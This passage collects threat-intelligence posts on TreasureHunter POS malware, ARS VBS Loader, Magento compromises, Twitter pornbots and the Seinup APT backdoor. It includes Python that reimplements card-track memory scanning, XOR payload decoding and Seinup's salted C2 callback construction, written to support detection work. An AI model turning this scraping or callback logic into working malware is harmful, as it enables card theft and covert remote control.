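TRACK2_RE = re.compile(rb"(?<![0-9])([0-9]{13,19})=([0-9]{2})([0-9]{2})([0-9]{3})[0-9]*")

# Constructed buffer standing in for a POS process memory dump (not real data).
SAMPLE_MEMORY = (
    b"\x00\x01 terminal state \xff\xfe"
    b";4111111111111111=23122011234567890?"     # Luhn-valid, service code 201
    b" more noise "
    b";4111111111111112=2312101000000000?"      # fails Luhn: not a card number
    b" \x00"
    b";5555555555554444=2412999000?"            # Luhn-valid, service code 999
    b"\x00\x00"
)


def should_scan(image_path: str) -> bool:
    """Mirror the malware's exclusion check: skip any process whose path
    contains one of the exception strings."""
    return not any(exc in image_path for exc in SCAN_EXCEPTIONS)


def luhn_ok(pan: str) -> bool:
    """Luhn check digit validation; filters out digit runs that are not PANs."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def scan_track2(buf: bytes, service_codes=None) -> list:
    """Find Track 2 records in buf. Only Luhn-valid PANs count; when a
    service-code set is given, records with other codes are dropped, which is
    the filter the source applies. PANs are masked in the result."""
    hits = []
    for m in TRACK2_RE.finditer(buf):
        pan = m.group(1).decode()
        code = m.group(4).decode()
        if not luhn_ok(pan):
            continue
        if service_codes is not None and code not in service_codes:
            continue
        hits.append({
            "offset": m.start(),
            "pan_masked": pan[:6] + "*" * (len(pan) - 10) + pan[-4:],
            "expiry": f"{m.group(3).decode()}/{m.group(2).decode()}",   # MM/YY
            "service_code": code,
        })
    return hits


if __name__ == "__main__":
    if should_scan(r"C:\POS\pos.exe"):
        for hit in scan_track2(SAMPLE_MEMORY, SERVICE_CODES):
            print(hit)
```

The service-code filter is worth noting for detection engineering: the first digit of the code marks interchange rules and the third marks PIN/usage restrictions, so the source’s list (101, 201, 121, 231, 221, 110) selects cards usable for international magstripe transactions without a PIN, which is what dump shops can resell. A YARA or memory-scanning rule keyed on `=[0-9]{4}(101|201|121|231|221|110)` after a Luhn-valid PAN catches the same records this code does.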

Registry persistence for autostart is set under HKLM\Software\Microsoft\Windows\CurrentVersion\Run, with the value named “jucheck” (the name of the legitimate Java update checker).

Image 3: A registry key created by the malware for persistence.

The source code is consistent with the various samples seen in the wild over the last few years. The TreasureHunter config.h shows definite signs of modification over the lifespan of the malware. Early samples filled all of the configurable fields with FIELDNAME_PLACEHOLDER values to be overwritten by the builder. More recent samples, and the source code, instead write the actual config values directly into the fields, which makes the samples slightly smaller and means each reconfigured build is a fresh compile.

The post TreasureHunter Point-of-Sale Malware and Builder Source Code Leaked appeared first on Flashpoint.

Author: Flashpoint

RAT Gone Rogue: Meet ARS VBS Loader

Malicious VBScript has long been a fixture of spam and phishing campaigns, but until recently its functionality has been limited to downloading malware from an attacker-controlled server and executing it on a compromised computer.

Researchers at Flashpoint have seen and analyzed a unique departure from this norm in ARS VBS Loader, a spin-off of a popular downloader called SafeLoader VBS that was sold and eventually leaked in 2015 on Russian crimeware forums.

ARS VBS Loader not only downloads and executes malicious code, but also includes a command and control application written in PHP that allows a botmaster to issue commands to a victim’s machine. This behavior likens ARS VBS Loader to a remote access Trojan (RAT), giving it behavior and capabilities rarely seen in malicious “loaders”, i.e. initial infection vector malware families used to install subsequent payloads.

Image 1: ARS VBS Loader’s administrative login portal.

The new loader has been spammed out in email attachments enticing victims with lures in subject lines related to personal banking, package shipments, and toll road notifications. Should a victim interact with the attachment and launch it, analysts say numerous types of commodity malware could be installed, including the AZORult information-stealing malware. AZORult was also used in campaigns targeting more than 1,000 Magento admin panels; in those attacks, the malware was used to scrape payment card information from sites running the popular free and open source ecommerce platform.

ARS VBS Loader targets only Windows machines and supports Windows 10, according to posts to a Russian-speaking forum going back to December. Previously, another loader called FUD ASPC Loader, first advertised in May 2017, contained similar functionality but not Windows 10 support.

The loader is also likely to side-step detection by signature-based antivirus and intrusion detection systems because of the relative ease with which attackers can obfuscate VBScript, Flashpoint analysts said. Obfuscation through a variety of means allows attackers to hide malware; if the malware is obfuscated with encryption or packing, for example, it is exponentially more difficult for antivirus to sniff out the malicious code.

Once the ARS VBS Loader executes on a victim’s computer, it immediately creates a number of entries in nearly a dozen autorun locations, including registry, scheduled tasks, and the startup folder, ensuring persistence through reboots. ARS VBS Loader will connect to the attacker’s server, sending it system information such as the operating system version name, computer user name, RAM, processor and graphics card information, a randomly generated ID for infection tracking, and machine architecture information.

Image 2: ARS VBS Loader submits check in information to the C2 in GET and POST parameters.

The botmaster, meanwhile, can remotely administer commands to bots through the PHP command-and-control application. Communication with the command-and-control server is carried out in plaintext over HTTP, making it easy to spot, Flashpoint analysts said.

The malicious code that runs on the victim’s machine is written entirely in VBScript and contains functionality for updating and deleting itself, deploying plugins such as a credentials stealer, launching application-layer denial-of-service (DoS) attacks against websites, and loading additional malware from external websites.

The most common command spotted by analysts is download, which instructs bots to download and execute malware from a supplied URL. There is also the plugin command where plugins that steal passwords or capture desktop screenshots can be pushed to compromised computers.

The DDoS command is also noteworthy because it’s a unique capability; analysts said they have not seen this command used in the wild. The command tells bots to send a specified amount of HTTP POST requests to a particular URL. Since this is a simple application layer flooding attack, it is currently unknown how successful this attack would be against targets in the wild, analysts said, adding that it would be easy to spot such traffic because the same hardcoded POST values are sent in the HTTP flood.

Image 3: Example DDoS HTTP flooding traffic from an infected bot.

Analysts caution that users should be vigilant about not opening email attachments from unknown sources, and that it’s likely ARS VBS Loader will continue to be an effective initial infection vector for spam campaigns.

To download the indicators of compromise (IOCs) for the ARS VBS Loader, click here.

To download the Yara rule for the ARS VBS Loader, click here.

The post RAT Gone Rogue: Meet ARS VBS Loader appeared first on Flashpoint.

Author: Flashpoint

Compromised Magento Sites Delivering Malware

Ecommerce websites running on the popular open-source Magento platform are being targeted by attackers who are using brute-force password attacks to access administration panels to scrape credit card numbers and install malware that mines cryptocurrency.

Researchers at Flashpoint are aware of the compromise of at least 1,000 Magento admin panels, and said that interest in the platform has continued unabated on entry-level and top-tier Deep & Dark Web forums since 2016. Attackers have also demonstrated continued interest in other popular ecommerce-processing content management systems such as Powerfront CMS and OpenCart.

The Magento sites are being compromised through brute-force attacks using common and known default Magento credentials. Brute-force attacks such as these are simplified when admins fail to change the credentials upon installation of the platform. Attackers, meanwhile, can build simple automated scripts loaded with known credentials to facilitate access to the panels.

Once the attacker has control of the site’s Magento CMS admin panel, they have unfettered access to the site and the ability to add any script they choose. In this case, the attackers were injecting malicious code in the Magento core file, allowing them access to pages where payment data is processed. POST requests to the server containing sensitive data are then intercepted and redirected to the attacker.

Flashpoint analysts said the compromised sites return an exploit in the form of a phony Adobe Flash Player update, which if launched by the user runs malicious JavaScript that downloads malware from attacker-controlled servers on GitHub and other compromised sites onto the victim’s computer.

Analysts said the infection chain begins with the installation of data-stealing malware called AZORult from a binary hosted on GitHub. AZORult then downloads additional malware; in this campaign, the additional malware is the Rarog cryptocurrency miner. The attackers are keen on avoiding detection and update the malicious files daily in order to sidestep signature- and behavior-based detection. Flashpoint said the accounts hosting these files have been active since 2017.

Image 1: Anatomy of the attack.

Flashpoint said that most of the victims among the 1,000 panels it is aware of are in the education and healthcare industries, and that the IP addresses of the compromised panels map to locations in the United States and Europe.

Analysts assess that this is likely only a set of a larger sample of compromised Magento panels.

Flashpoint is working with law enforcement to notify victims of these compromises.

Image 2: The IP addresses for the compromised panels in the sample set map predominantly to Europe and the United States.

In the meantime, the rash of attacks resurrects the epidemic of default credential usage among admins. Default credentials were at the core of the 2016 Mirai attacks, where hackers were able to access connected devices such as security cameras, DVRs and routers using known and common default passwords. The compromised IoT devices were corralled into a massive botnet that was pointed at a number of high-value targets, including DNS provider Dyn, French webhost OVH, and journalist Brian Krebs’ website, in order to carry out crippling distributed denial-of-service attacks. The DDoS attack against Dyn peaked at 1 terabyte-per-second and took a number of popular websites and services offline for the better part of a day in October 2016, including Twitter, Spotify and GitHub.

Magento admins are advised to review CMS account logins and mitigate their exposure to brute-force attacks by enforcing the following password-hygiene practices:

  • Enforce organizational password complexity requirements.
  • Restrict users from recycling previously used passwords.
  • Enable two-factor authentication for sensitive systems, applications, databases, and remote access solutions.
  • Supply users with secure password managers to assist with password requirements.

The indicators of compromise (IOCs) for AZORult, Rarog, and the campaign targeting Magento are available for download here. The Yara rule is available for download here.

The post Compromised Magento Sites Delivering Malware appeared first on Flashpoint.

Author: Flashpoint

Inside a Twitter ‘Pornbot’ Campaign

Flashpoint analysts recently investigated the trend of adult entertainment-themed Twitter bots known as pornbots, which post tweets with hashtags containing popular brand names alongside random, unrelated terms. The observed set of pornbots appears to be a mix of compromised accounts and accounts specifically created to advertise pornography. As such, organizations mentioned in these bots’ pornographic advertising campaigns on Twitter may suffer reputational damage in addition to distorted social media engagement campaign metrics.

Image 1: Sample of tweets containing brand hashtags and random terms. Brand names have been sanitized.

In recent years, Twitter has become a primary form of external, two-way communication and engagement for organizations across all sectors. For example, companies often use hashtags to monitor the spread and reception of marketing campaigns and sponsored events. More crucially, emergency services may use hashtag tracking to gain real-time insight into current situations during natural disasters and other crises. In a worst-case scenario, pornbots or other spambots could identify a trending hashtag and distort the conversation by sharing unrelated or false information.

Image 2: Three sample pornbot Twitter accounts using the same profile picture. Each pornbot has a different username, bio, and join date, and each bio contains a link to a different adult entertainment website. However, these adult entertainment websites were hosted on common servers.

Flashpoint analysts identified three distinct sets of pornbots using identical hashtags, indicating they were likely part of the same organized campaign. While similar in appearance and often using a common set of profile pictures across the groups, each promoted a different adult website. However, the three adult websites linked to the sample profiles shown above were hosted on one of two common servers, which may indicate the pornbots share a common origin. Flashpoint analysts did not detect any malicious files on the servers hosting the websites advertised by the pornbots.

Advertising Methods

Flashpoint analysts observed two primary methods of advertising across the pornbot accounts:

• Hashtagged tweets: The first advertising method utilized hashtags followed by random risqué buzzwords and a link to an adult dating or video website, often featuring online “cam girls” or escort services.

• Link in bio and pinned tweet: The second advertising method includes multiple accounts sharing similar bios and pinned tweets, which contain links to adult content sites.

Image 3: Example of the first method of advertising adult entertainment sites, whereby links are included within hashtagged tweets.

Image 4: Example of a pornbot account using the second advertising method, whereby links to adult websites are included in the bio and the pinned tweet.

Identifying Pornbots

Image 5: Sample guide to identifying pornbots and spambots.

Over the course of their investigation, Flashpoint analysts noted several common traits that can be used to identify pornbots and other spambots:

• Reused profile images: The profile pictures used by the observed pornbots were all obtained from public profiles on open-source websites, primarily Instagram and Pinterest. Reverse searches using Google Images indicated these stolen images were reused by multiple pornbots.

• Systematic coordination: Related sets of pornbots systematically coordinated their tweets. One pornbot would post a tweet containing a hashtag, and other pornbots within its group would subsequently post tweets containing the same hashtag, followed by random and unrelated terms.

• Many tweets, but few followers: Each of the observed pornbots posted tweets at a rapid cadence, with some posting more than 50 times per day. Most of the observed pornbot accounts boasted more than 10,000 tweets, but typically had fewer than 200 followers. Similarly, most of the pornbots were following fewer than 200 other users.

Image 6: Example of a reverse Google Images search revealing use of a single profile image across multiple pornbot accounts.

Image 7: Example of systemically coordinated tweeting among pornbots.

Pornbot Mitigation Best Practices

The following mitigation measures may help reduce the number of pornbots and spambots using brand names. These steps may also reduce the number of false detections and aid in validating social media metrics:

• Challenge social media teams to identify and block pornbots and spambots following company social media accounts. This action impacts the bots’ ability to capture and retweet relevant and branded tweets.

• Require social media teams to report these accounts through Twitter’s abuse function.

• Implement response actions to react to large campaigns, such as social media teams and cyber threat teams notifying each other when activity is detected.

The post Inside a Twitter ‘Pornbot’ Campaign appeared first on Flashpoint.

Author: Flashpoint

Trojan.APT.Seinup Hitting ASEAN

1. Executive Summary

The FireEye research team has recently identified a number of spear
phishing activities targeting Asia and ASEAN. Of these, one of the
spear phishing documents was suspected to have used a potentially
stolen document as a decoy. The rich and contextual details (body and
metadata) which are not available online lead us to believe this was
stolen. This decoy document mentioned countries such as Brunei,
Cambodia, Indonesia, Laos, Malaysia, Myanmar, Philippines, Singapore,
Thailand, and Vietnam, which leads us to suspect that these countries
are targeted. As the content of this decoy document is suspected to be
a stolen sensitive document, the details will not be published.

This malware was found to have used a number of advanced techniques
which make it interesting:

  1. The malware leverages Google Docs to perform redirection to
     evade callback detection. This technique was also found in the
     malware dubbed “Backdoor.Makadocs” reported by Takashi
     Katsuki (Katsuki, 2012).
  2. It is heavily equipped with a variety of cryptographic functions
     to perform some of its functions.
  3. The malicious DLL is manually loaded into memory, which hides it
     from DLL listing.

As depicted in the diagram below, the spear phishing document (which
exploits CVE-2012-0158) creates a decoy document and a malware dropper
named exp1ore.exe. This dropper will then drop wab.exe (Address Book
Application) and wab32res.dll (malicious DLL) inside the temp folder.
By running wab.exe, the malicious DLL named wab32res.dll (located
within the same folder) will be loaded using DLL side-loading
technique. This will in turn install a copy of wab32res.dll as
msnetrsvw.exe inside the windows directory to be registered as Windows
service. By registering as a Windows service, it allows the malware to
survive every reboot and persist on the network.


Figure 1 Infection Flow

This malware is named “Trojan.APT.Seinup” because one of its export
functions is named “seinup”. This malware was analysed to be a
backdoor that allows the attacker to remotely control the infected system.


Figure 2 Exported Functions

2. Related APT Domain and MD5

Based on our threat intelligence and reverse-engineering effort,
below are some related domains and MD5 sums. Please note that some of
the domain/IP associations may change.

2.1. Related Domain

Domain/URL IP Country Comments

(The domain, IP and country values of this table are not present in
this copy of the post; only the registrar comments survive: three
entries with “Registrar: XIN NET” and one with “Registrar: SHANGHAI”.)

2.2. Associated Files

Name MD5 Comments

(The file names and MD5 sums of this table are not present in this
copy of the post; the surviving comments are listed below.)

  • Spear-phishing document and decoy document
  • Benign Address Book Application
  • Malware to be side loaded when wab.exe is launched.
  • Malware to be installed as a service. Note: This is the same as
    wab32res.dll.
  • Several further rows whose comment reads “Calls to”, followed by a
    callback domain that is not present in this copy.

3. Interesting Technical Observations

3.1. Redirection Using Google Docs

By connecting to the malicious server via Google Docs, the malicious
communication is protected by the legitimate SSL provided by Google
Docs (see Figure below). One possible way to examine the SSL traffic
is to make use of a hardware SSL decrypter within an organisation.
Alternatively, you may want to examine the usage pattern of the users:
if a particular user accesses Google Docs multiple times a day, the
organization’s Incident Response team may want to dig deeper to find
out whether the traffic is triggered by a human or by malware.

Figure 3 Retrieve Command via Google Docs

Below is the code that is used to construct a URL that retrieves the
command via Google Docs. First, the malicious URL is constructed and
then encoded. Next, the malware simply leverages the Google Docs
viewer to retrieve the command from the malicious server (see Figure
below).

Figure 4 View Command via Google Docs
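The usage-pattern check suggested in 3.1, as an added example (not FireEye's code): it scans proxy log lines for Google Docs viewer requests, pulls out the external URL carried in the viewer's query string, and flags any user who fetches the same external host through the viewer more than a few times in one day. It assumes TLS is already terminated (for instance by the SSL decrypter mentioned above) so the log holds full URLs; the log layout, the viewer URL shape and the sample lines are constructed.

```python
"""Flag users whose Google Docs viewer traffic looks like a C2 relay: the same
external target fetched through docs.google.com/viewer many times a day.

Added example, not FireEye's code. Assumes a proxy log with full URLs (TLS
already terminated); the log layout, viewer URL shape and lines are constructed.
"""
from collections import defaultdict
from typing import Dict, Optional
from urllib.parse import parse_qs, urlsplit

# Constructed proxy log: ISO timestamp, user, requested URL.
SAMPLE_LOG = """\
2013-06-01T09:00:01 alice https://docs.google.com/document/d/abc123/edit
2013-06-01T09:05:10 bob https://docs.google.com/viewer?url=http%3A%2F%2Fcmd.example.invalid%2Fc.txt&embedded=true
2013-06-01T09:35:12 bob https://docs.google.com/viewer?url=http%3A%2F%2Fcmd.example.invalid%2Fc.txt&embedded=true
2013-06-01T10:02:44 bob https://docs.google.com/viewer?url=http%3A%2F%2Fcmd.example.invalid%2Fc.txt&embedded=true
2013-06-01T10:31:03 bob https://docs.google.com/viewer?url=http%3A%2F%2Fcmd.example.invalid%2Fc.txt&embedded=true
2013-06-01T11:15:00 alice https://docs.google.com/viewer?url=https%3A%2F%2Fintranet.example%2Fq3.pdf
2013-06-02T08:12:09 bob https://docs.google.com/viewer?url=http%3A%2F%2Fcmd.example.invalid%2Fc.txt&embedded=true
"""


def viewer_target(url: str) -> Optional[str]:
    """Return the URL embedded in a Google Docs viewer request, else None."""
    parts = urlsplit(url)
    if parts.netloc != "docs.google.com" or not parts.path.startswith("/viewer"):
        return None
    targets = parse_qs(parts.query).get("url")   # parse_qs also percent-decodes
    return targets[0] if targets else None


def find_suspects(log_text: str, max_per_day: int = 3) -> Dict[str, Dict[str, int]]:
    """Count viewer fetches per (user, day, target host) and report users who
    pull one external host through the viewer more than max_per_day times in
    a day. A person opens a given document a few times; a beacon does not stop."""
    counts: Dict[tuple, int] = defaultdict(int)
    for line in log_text.splitlines():
        try:
            ts, user, url = line.split(" ", 2)
        except ValueError:
            continue                                  # malformed line, skip it
        target = viewer_target(url)
        if target is None:
            continue
        host = urlsplit(target).hostname or target
        counts[(user, ts[:10], host)] += 1            # ts[:10] is the calendar day
    suspects: Dict[str, Dict[str, int]] = defaultdict(dict)
    for (user, day, host), n in counts.items():
        if n > max_per_day:
            suspects[user][host] = suspects[user].get(host, 0) + n
    return dict(suspects)


if __name__ == "__main__":
    for user, hosts in find_suspects(SAMPLE_LOG).items():
        print(user, hosts)
```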

3.2. Zero-Skipping XOR Encryption

The shellcode encryption technique is fairly standard. The shellcode
has a decryption stub which decrypts its body using the XOR key 0x9E,
and this shellcode is used to extract exp1ore.exe (malware) and Wor.doc
(benign document).

The exp1ore.exe and Wor.doc were found within the spear phishing
document, encrypted using the same technique with the key 0xFC. The XOR
decryption touches only non-zero bytes (see Figure 5). This prevents
statistical methods of recovering the XOR key. The encrypted
executable file and benign document were identified to be located
inside the spear phishing document at offsets 0x2509 and 0x43509 respectively.


Figure 5 Zero Skipping XOR Encryption

Even though statistical methods may not be useful in identifying the
XOR key as the zero bytes are not encrypted, we could use some of the
“known” strings below to hunt for the XOR key in this situation. By
sliding the known string across the array of bytes to perform a
windowed XOR, the key would be revealed when the encoded data is XORed
with the known string.

  • “This program cannot be run in DOS mode”
  • “KERNEL32.dll”
  • “LoadLibraryA”
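The zero-skipping decode and the known-string key hunt described above, as an added example (not FireEye's code). The sample carrier, its key and the embedded offset are constructed; the hunt slides each known string across the data and accepts an offset only where every non-zero position XORs to the same key byte and every zero byte matches exactly.

```python
"""Zero-skipping XOR: decode an embedded payload and recover its one-byte key
by sliding a known plaintext string across the data (windowed XOR).

Added example, not FireEye's code. The sample blob, key and offset below are
constructed; the post's document used keys 0x9E and 0xFC at the offsets it gives.
"""
from __future__ import annotations

from collections import Counter
from typing import Optional

# Strings the post suggests as known plaintext for a hidden PE file.
KNOWN_STRINGS = [
    b"This program cannot be run in DOS mode",
    b"KERNEL32.dll",
    b"LoadLibraryA",
]


def xor_skip_zero(data: bytes, key: int) -> bytes:
    """XOR every non-zero byte with key; zero bytes pass through untouched.

    Because the many zero bytes of a PE file are never transformed, the usual
    "most frequent ciphertext byte is the key" statistic fails. The transform
    inverts itself except for plaintext bytes equal to key, which collapse to
    zero (a limitation of the stub as the post describes it)."""
    return bytes(b ^ key if b else 0 for b in data)


def hunt_xor_key(data: bytes, known: bytes, min_hits: int = 8) -> list[tuple[int, int]]:
    """Slide `known` across `data`; report (offset, key) pairs where XORing the
    window with the known string yields one consistent non-zero key byte.

    A zero ciphertext byte can only come from a zero plaintext byte, so such
    positions must match exactly instead of contributing a key candidate."""
    hits: list[tuple[int, int]] = []
    for off in range(len(data) - len(known) + 1):
        window = data[off:off + len(known)]
        keys = set()
        count = 0
        consistent = True
        for c, p in zip(window, known):
            if c == 0 or p == 0:
                if c != p:           # zero never changes, so a mismatch rules out this offset
                    consistent = False
                    break
                continue
            keys.add(c ^ p)
            count += 1
            if len(keys) > 1:        # two different keys in one window: not here
                consistent = False
                break
        if consistent and len(keys) == 1 and count >= min_hits:
            hits.append((off, keys.pop()))
    return hits


def recover_key(data: bytes) -> Optional[int]:
    """Vote across all known strings and return the best-supported key byte."""
    votes: Counter[int] = Counter()
    for s in KNOWN_STRINGS:
        for _, key in hunt_xor_key(data, s):
            votes[key] += 1
    return votes.most_common(1)[0][0] if votes else None


def build_sample(key: int = 0xFC, offset: int = 0x40) -> bytes:
    """Constructed carrier: an OLE-style header, zero filler, then a fake PE
    image encrypted with the zero-skipping XOR at `offset` (standing in for the
    spear-phishing document with the executable embedded inside it)."""
    fake_pe = (
        b"MZ\x90\x00\x03\x00\x00\x00" + b"\x00" * 0x38
        + b"This program cannot be run in DOS mode.\r\n$\x00\x00"
        + b"KERNEL32.dll\x00LoadLibraryA\x00"
    )
    carrier = b"\xd0\xcf\x11\xe0" + b"\x00" * (offset - 4)
    return carrier + xor_skip_zero(fake_pe, key)


if __name__ == "__main__":
    blob = build_sample()
    key = recover_key(blob)
    print(f"recovered key: {key:#04x}")
    # The DOS stub sits 0x40 bytes into a PE image, so back up to find the header.
    start = hunt_xor_key(blob, KNOWN_STRINGS[0])[0][0] - 0x40
    print(xor_skip_zero(blob[start:], key)[:8])
```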

3.3. Deployment of Various Cryptographic Functions

3.3.1. Secure Callback

The malware performs the callback in a secure manner. It uses a
custom Base64 map to encode its data, and creates a salted digital
thumbprint to allow validation of data.

Below describes the steps to validate a callback using an example of
the following URL:









The URL could be generalised as follows:


The definition of A’, B’, C’ and D’ are as follows:

Let H be the function which encodes each byte as hexadecimal
characters prepended with “%” if it is not alphanumeric, dash,
underscore or dot

Let B64 be the base 64 encoder using the following custom map, “URPBnCF1GuJwH2vbkLN6OQ/5S9TVxXKZaMc8defgiWjmo7pqrAstyz0D+El3I4hY”.

Let PT be the plain text which is in the form of
where HostName and IPAddress are string, and RunType is a character.

Let A be a random string of 3 to 7 characters, and A’ = H(A)

Let B be B64(PT), and B’ = H(B)

Let C be a 32-character delimiter, and C’ = H(C)

Let D be H( MD5 ( salt + MD5 ( B64(PT) + A + C ) ) ), where salt =
“%^^*HFH)*$FJK)234sd2N@C(JGl2z94cg23”, and D’ = H(D)

Hence, in this case, the specific malicious URL could be applied as follows:

Domain/  =

A’ = “5Pb

B’ = “6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S%2Bw8npH5oAZk==

C’ = “cc3237bc79192a096440faca0fdae107

D’ = “


(This is the digital signature)

The hash could be verified as follows:

B64(PT) + A + C =
“6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk==” +  “5Pb” + “cc3237bc79192a096440faca0fdae107”

MD5 (B64(PT) + A + C) = “766cf9e96c1a508c59f7ade1c50ecd28”

MD5 (salt + MD5(B64(PT) + A + C))   = MD5 (
“%^^*HFH)*$FJK)234sd2N@C(JGl2z94cg23” + “766cf9e96c1a508c59f7ade1c50ecd28”)

= 349118df672db38f9e65659874b60b27
(This equals D’, which means the callback is verified)

The encoded plain text (B) could be recovered:

B64(PT) = “6QeZky42OCQOLQuZ6dC2LQ7F56iAv6GpH6S+w8npH5oAZk==”;

is the hostname, ‘F’ is the run type, “” is the IP address.

Note: This example is mocked up using a dummy computer name and IP address.

The python code below could be used to decode the custom encoded
string (see Figure below).


Figure 6 Python to Decode a Custom Base 64
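The custom Base64 decoder of Figure 6 together with the full A', B', C', D' validation from 3.3.1, as an added example (not FireEye's code). The alphabet and salt are the ones quoted in the post; the query parameter names, the host and the plaintext layout are constructed placeholders, since the post elides them and notes the parameter names are random.

```python
"""Validate a Seinup-style callback URL: custom Base64, the percent-encoder
H(), and the salted MD5 thumbprint described in section 3.3.1.

Added example, not FireEye's code. CUSTOM_MAP and SALT are quoted from the
post; parameter names p1..p4, the host and the plaintext layout are constructed.
"""
import base64
import hashlib
import hmac
import secrets
import string
from typing import Optional
from urllib.parse import parse_qs, urlsplit

CUSTOM_MAP = "URPBnCF1GuJwH2vbkLN6OQ/5S9TVxXKZaMc8defgiWjmo7pqrAstyz0D+El3I4hY"
STD_MAP = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
SALT = "%^^*HFH)*$FJK)234sd2N@C(JGl2z94cg23"
_TO_STD = str.maketrans(CUSTOM_MAP, STD_MAP)
_TO_CUSTOM = str.maketrans(STD_MAP, CUSTOM_MAP)
_SAFE = set(string.ascii_letters + string.digits + "-_.")


def custom_b64_encode(raw: bytes) -> str:
    """Standard Base64, then remap each symbol into the malware's alphabet."""
    return base64.b64encode(raw).decode("ascii").translate(_TO_CUSTOM)


def custom_b64_decode(text: str) -> bytes:
    """Inverse of custom_b64_encode (what the post's Figure 6 script does)."""
    return base64.b64decode(text.translate(_TO_STD).encode("ascii"))


def H(text: str) -> str:
    """Percent-encode every byte that is not alphanumeric, dash, underscore or dot.
    (The post's worked example leaves '=' padding bare; parse_qs accepts both.)"""
    return "".join(chr(b) if chr(b) in _SAFE else f"%{b:02X}" for b in text.encode("utf-8"))


def thumbprint(b64_pt: str, a: str, c: str) -> str:
    """D = MD5(salt + MD5(B64(PT) + A + C)) as hex; H(D) is D itself."""
    inner = hashlib.md5((b64_pt + a + c).encode("ascii")).hexdigest()
    return hashlib.md5((SALT + inner).encode("ascii")).hexdigest()


def build_callback(base: str, plaintext: bytes, a: Optional[str] = None) -> str:
    """Assemble A', B', C', D' into a GET URL the way the post describes.
    Parameter names p1..p4 stand in for the malware's random names."""
    a = a or "".join(secrets.choice(string.ascii_letters) for _ in range(secrets.choice(range(3, 8))))
    c = secrets.token_hex(16)                 # the 32-character delimiter
    b = custom_b64_encode(plaintext)
    d = thumbprint(b, a, c)
    return f"{base}?p1={H(a)}&p2={H(b)}&p3={H(c)}&p4={H(d)}"


def verify_callback(url: str) -> Optional[bytes]:
    """Recompute the thumbprint from A, B, C and return PT only if it matches D."""
    q = parse_qs(urlsplit(url).query)         # parse_qs undoes H() for us
    try:
        a, b, c, d = (q[k][0] for k in ("p1", "p2", "p3", "p4"))
    except KeyError:
        return None
    if len(c) != 32:
        return None
    if not hmac.compare_digest(thumbprint(b, a, c).encode(), d.encode()):
        return None                           # signature mismatch: tampered or not ours
    return custom_b64_decode(b)


if __name__ == "__main__":
    # Constructed plaintext; the real layout (HostName, IPAddress, RunType) is elided in the post.
    url = build_callback("http://c2.example.invalid/cb", b"HOST-01|F|192.0.2.10", a="5Pb")
    print(url)
    print(verify_callback(url))
```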

3.3.2. Random Generator Using Mersenne Twister Algorithm

The malware was found to perform its callback at random intervals so
as to evade network investigations that look for network connections
performed at a regular interval. Additionally, even the names of the
parameters in the GET string have a random length and name, which
makes it hard to create a fixed signature to detect such callbacks
(see 3.3.1 to understand how a callback is created).


Figure 7 Mersenne Twister Algorithm Seeding function

3.4. In-Memory Only Malicious Code

On the disk, the malicious code is either encrypted or compressed to
evade scanning using signature rules. Only upon being loaded into
memory does the malicious code (which appears to be in the form of a
DLL) get manually loaded, without the use of the Windows 32 API. In this
way, when an investigation is performed, the malicious DLL is not
revealed. Additionally, it makes it much harder for analysis to be performed.


Figure 8 Segments in the memory which contains the malicious code

Taking a deeper look at the decrypted malicious code, this malware
was found to contain at least the following functions:

  • Download file
  • Download and execute or load
  • Change sleep duration
  • Open and close interactive sessions

4. Conclusion

Malware is increasingly becoming more contextually advanced. It
attempts to appear as much as possible like legitimate software or
documents. In this example, we would conclude the following.

  1. A potentially stolen document was used as a decoy document to
     increase its credibility. It is also a sign that the compromised
     organisations could be used as a soft target to compromise their
     business partners and allies.
  2. It is important to put a stop to the malware infection at the
     very beginning, which is the exploitation phase. Once a network is
     compromised, it is increasingly harder to detect such threats.
  3. Anti-incident response/forensic techniques are increasingly used
     to evade detection. It would require a keen eye for details and a
     wealth of experience to identify all these advanced techniques.

5. Works Cited

Carnegie Mellon University. (n.d.). Retrieved from

Katsuki, T. (19 Nov, 2012). Malware Targeting Windows 8 Uses Google
Docs. Retrieved from

I would like to thank several colleagues for their significant
contributions on this post: Darien Kindlund, Ned Moran, Nart
Villeneuve, and Thoufique Haq.

Author: Chong Rong Hwa

Malware Callbacks

Today we released our first-ever analysis of malware callbacks. Our
report can be accessed here:

FireEye monitored more than 12 million malware communications seeking
instructions—or callbacks—across hundreds of thousands of infected
enterprise hosts, capturing details of advanced attacks as well as
more generic varieties during the course of 2012. Callback activity
reveals a great deal about an attacker’s intentions, interests and
geographic location. Cyber attacks are a widespread global activity.
We’ve built interactive maps that highlight the presence of malware

Our key findings:

  • Malware has become a multinational activity. Over the past
    year, callbacks were sent to command and control (CnC) servers in 184
    countries—a 42 percent increase when compared to 130 countries in 2010.
  • Two key regions stand out as hotspots driving advanced cyber
    attacks: Asia and Eastern Europe. Looking at the average
    callbacks per company by country, the Asian nations of China, South
    Korea, India, Japan, and Hong Kong accounted for 24 percent. Not far
    behind, the Eastern European countries of Russia, Poland, Romania,
    Ukraine, Kazakhstan, and Latvia comprised 22 percent. (North America
    represented 44 percent but this is due to CnC servers residing in the
    United States to help attackers with evasion.)
  • The majority of Advanced Persistent Threat (APT) callback
    activities are associated with APT tools that are made in China or
    that originated from Chinese hacker groups. By mapping the DNA
    of known APT malware families against callbacks, FireEye Malware
    Intelligence Lab discovered that the majority of APT callback
    activities—89 percent—are associated with APT tools that are made in
    China or that originated from Chinese hacker groups. The main tool is
    Gh0st RAT.
  • Attackers are increasingly sending initial callbacks to servers
    within the same nation in which the target resides. To improve
    evasion, hackers are increasingly placing CnC servers within target
    nations. At the same time, this fact gives a strong indicator of which
    countries are most interesting to attackers.
  • Technology organizations are experiencing the highest rate of APT
    callback activity. With a high volume of intellectual property,
    technology firms are natural targets for attackers and are
    experiencing heavy APT malware activity.
  • For APT attacks, CnC servers were hosted in the United States 66
    percent of the time, a strong indicator that the U.S. is still the
    top target country for attacks. As previously mentioned,
    attackers increasingly put CnC servers in the target country to help
    avoid detection. With such a high proportion of CnC servers, by a wide
    margin, the U.S. is subject to the highest rate of malware attacks.
    This is likely due to a very high concentration of intellectual
    property and digitized data that resides in the U.S.
  • Techniques for disguising callback communications are evolving.
    To evade detection, CnC servers are leveraging social networking sites
    like Facebook and Twitter for communicating with infected machines.
